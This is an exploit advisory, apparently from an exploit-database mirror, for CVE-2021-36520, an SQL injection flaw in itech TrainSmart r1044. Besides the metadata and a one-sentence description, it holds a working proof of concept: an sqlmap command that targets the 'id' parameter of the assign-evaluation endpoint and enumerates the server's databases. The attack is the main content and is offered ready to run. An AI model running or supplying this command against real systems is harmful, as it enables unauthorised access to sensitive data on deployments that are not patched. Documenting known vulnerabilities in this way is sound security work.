Share
## https://sploitus.com/exploit?id=PACKETSTORM:171731
# Exploit Title: itech TrainSmart r1044 - SQL injection  
# Date: 03.02.2023  
# Exploit Author: Adrian Bondocea  
# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/  
# Version: TrainSmart r1044  
# Tested on: Linux  
# CVE : CVE-2021-36520  
  
SQL injection vulnerability in itech TrainSmart r1044 allows remote  
attackers to view sensitive information via crafted command using sqlmap.  
  
PoC:  
sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs